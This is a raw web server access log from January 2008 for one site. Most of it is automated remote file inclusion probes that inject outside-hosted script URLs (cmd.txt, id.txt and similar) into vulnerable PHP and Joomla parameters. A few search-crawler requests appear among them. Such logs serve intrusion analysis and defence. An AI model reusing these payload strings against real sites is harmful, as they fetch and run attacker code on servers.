89.171.105.130 - - [25/Jan/2008:15:37:05 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:15:37:05 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [25/Jan/2008:15:38:12 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [25/Jan/2008:15:38:12 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [25/Jan/2008:15:38:12 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:15:38:37 -0800] "GET /logs/access_071229.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:15:38:37 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:15:39:20 -0800] "GET /logs//livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.146.6 - - [25/Jan/2008:15:39:20 -0800] "GET //livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
199.237.204.148 - - [25/Jan/2008:15:39:48 -0800] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:15:40:28 -0800] "GET /logs/access_080101.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.71 - - [25/Jan/2008:15:40:30 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.239.177.121 - - [25/Jan/2008:15:41:00 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=%20http://www.modem56.info/modules/postguestbook/styles/internal/header.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.239.177.121 - - [25/Jan/2008:15:41:00 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=%20http://www.modem56.info/modules/postguestbook/styles/internal/header.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:15:41:41 -0800] "GET //modules/My_eGallery/index.php?basepath=http://www.freelance-media.ca//dotproject/classes/.r/xxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:15:42:16 -0800] "GET //mvcw.php?step=http://www.freelance-media.ca//dotproject/classes/.r/xxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:15:42:17 -0800] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [25/Jan/2008:15:42:18 -0800] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.58.105.34 - - [25/Jan/2008:15:43:25 -0800] "GET /logs//errors.php?errorhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
12.162.162.251 - - [25/Jan/2008:15:43:26 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://everybodyrateit.com/robot.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.58.105.34 - - [25/Jan/2008:15:43:26 -0800] "GET //errors.php?errorhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
12.162.162.251 - - [25/Jan/2008:15:43:26 -0800] "GET //?mosConfig_absolute_path=http://everybodyrateit.com/robot.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [25/Jan/2008:15:43:26 -0800] "GET /logs//?mosConfig_absolute_path=http://everybodyrateit.com/robot.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 200 31688 "-" "libwww-perl/5.803" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:15:43:38 -0800] "GET ///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.freelance-media.ca//dotproject/classes/.r/xxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.162.162.251 - - [25/Jan/2008:15:45:17 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://everybodyrateit.com/robot.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
199.237.204.148 - - [25/Jan/2008:15:45:47 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
218.163.197.176 - - [25/Jan/2008:15:46:28 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.28.146 - - [25/Jan/2008:15:47:19 -0800] "GET /logs/access_070812.log HTTP/1.0" 200 37724 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.169.184.251 - - [25/Jan/2008:15:47:23 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.184.251 - - [25/Jan/2008:15:47:23 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.184.251 - - [25/Jan/2008:15:47:24 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:15:47:33 -0800] "GET /errors.php?error=http://safetest.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:15:47:33 -0800] "GET /logs/errors.php?error=http://safetest.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.169.184.251 - - [25/Jan/2008:15:48:24 -0800] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.85.29.25 - - [25/Jan/2008:15:48:32 -0800] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.107 - - [25/Jan/2008:15:49:09 -0800] "GET /logs/access.log HTTP/1.0" 200 431737 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:15:49:42 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [25/Jan/2008:15:50:18 -0800] "GET /megumi/?N=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
199.237.204.148 - - [25/Jan/2008:15:56:20 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
199.237.204.148 - - [25/Jan/2008:15:56:20 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
199.237.204.148 - - [25/Jan/2008:15:56:20 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:15:57:05 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.94.230.194 - - [25/Jan/2008:15:59:34 -0800] "GET /s.php?table=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.52.143.16 - - [25/Jan/2008:16:01:22 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.52.143.16 - - [25/Jan/2008:16:01:32 -0800] "GET /presto HTTP/1.1" 301 91 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
82.94.230.194 - - [25/Jan/2008:16:03:54 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:16:03:57 -0800] "GET /errors.php?error=http://zal.sioru.net/KOMA/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.22 - - [25/Jan/2008:16:05:17 -0800] "GET /logs/access_070919.log HTTP/1.0" 200 35028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:16:07:31 -0800] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.freelance-media.ca//dotproject/classes/.r/xxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:16:07:32 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.freelance-media.ca//dotproject/classes/.r/xxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:16:11:12 -0800] "GET /logs/access.log///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.freelance-media.ca//dotproject/classes/.r/xxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:16:11:13 -0800] "GET /logs///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.freelance-media.ca//dotproject/classes/.r/xxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.204.230.31 - - [25/Jan/2008:16:11:33 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [25/Jan/2008:16:12:01 -0800] "GET /index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
87.106.131.26 - - [25/Jan/2008:16:12:01 -0800] "GET /logs/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
80.87.131.98 - - [25/Jan/2008:16:12:06 -0800] "GET /logs/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
80.87.131.98 - - [25/Jan/2008:16:12:06 -0800] "GET /index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
82.94.230.194 - - [25/Jan/2008:16:12:45 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.94.230.194 - - [25/Jan/2008:16:12:46 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.28.224 - - [25/Jan/2008:16:12:51 -0800] "GET /index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.214.28.224 - - [25/Jan/2008:16:12:53 -0800] "GET /logs/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:16:13:25 -0800] "GET /logs/access_071230.log/errors.php?error=http://zal.sioru.net/KOMA/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:16:13:26 -0800] "GET /logs/errors.php?error=http://zal.sioru.net/KOMA/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:16:13:27 -0800] "GET /logs/access_071229.log/errors.php?error=http://zal.sioru.net/KOMA/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.150.200.101 - - [25/Jan/2008:16:16:52 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.150.200.101 - - [25/Jan/2008:16:16:52 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.150.200.101 - - [25/Jan/2008:16:16:53 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.150.200.101 - - [25/Jan/2008:16:16:53 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.150.200.101 - - [25/Jan/2008:16:16:54 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.150.200.101 - - [25/Jan/2008:16:16:54 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.193.55 - - [25/Jan/2008:16:21:33 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
62.75.193.55 - - [25/Jan/2008:16:21:33 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
82.94.230.194 - - [25/Jan/2008:16:24:25 -0800] "GET /logs/access_071229.log/s.php?table=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.94.230.194 - - [25/Jan/2008:16:24:25 -0800] "GET /logs/s.php?table=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.98.139.142 - - [25/Jan/2008:16:24:33 -0800] "GET /logs/access_071222.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.98.139.142 - - [25/Jan/2008:16:24:33 -0800] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.98.139.142 - - [25/Jan/2008:16:24:33 -0800] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.225 - - [25/Jan/2008:16:25:33 -0800] "GET /megumi/earrings/?N=D HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.156.153 - - [25/Jan/2008:16:25:52 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.55.156.153 - - [25/Jan/2008:16:25:52 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
81.193.127.94 - - [25/Jan/2008:16:29:49 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
81.193.127.94 - - [25/Jan/2008:16:29:49 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
212.204.230.31 - - [25/Jan/2008:16:30:24 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.230.31 - - [25/Jan/2008:16:30:24 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.230.31 - - [25/Jan/2008:16:30:48 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.52.143.16 - - [25/Jan/2008:16:32:16 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.52.143.16 - - [25/Jan/2008:16:32:18 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.169.187.243 - - [25/Jan/2008:16:32:26 -0800] "GET /logs/access_071230.log//squirrelcart/cart_content.php?cart_isp_root=http://www.venox.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [25/Jan/2008:16:32:27 -0800] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.venox.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [25/Jan/2008:16:32:27 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.venox.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.98.139.142 - - [25/Jan/2008:16:39:34 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:16:41:00 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.200.79.215 - - [25/Jan/2008:16:41:52 -0800] "GET /logs/access_071225.log//index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.79.215 - - [25/Jan/2008:16:41:52 -0800] "GET //index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.79.215 - - [25/Jan/2008:16:41:53 -0800] "GET /logs//index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.79.215 - - [25/Jan/2008:16:43:03 -0800] "GET /logs/access_071216.log//index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.218.149.119 - - [25/Jan/2008:16:43:53 -0800] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [25/Jan/2008:16:43:54 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [25/Jan/2008:16:43:54 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [25/Jan/2008:16:45:23 -0800] "GET /logs/access_071220.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:43 -0800] "GET /logs/access_071228.log//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:43 -0800] "GET //index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:43 -0800] "GET /logs//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:45 -0800] "GET /logs/access_071228.log//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:46 -0800] "GET //index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:46 -0800] "GET /logs//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:50 -0800] "GET /logs/access_071228.log//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:50 -0800] "GET //index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:51 -0800] "GET /logs//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:53 -0800] "GET /logs/access_071228.log//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:53 -0800] "GET /logs/access_071228.log//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:53 -0800] "GET //index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:53 -0800] "GET //index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:53 -0800] "GET /logs//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:45:53 -0800] "GET /logs//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
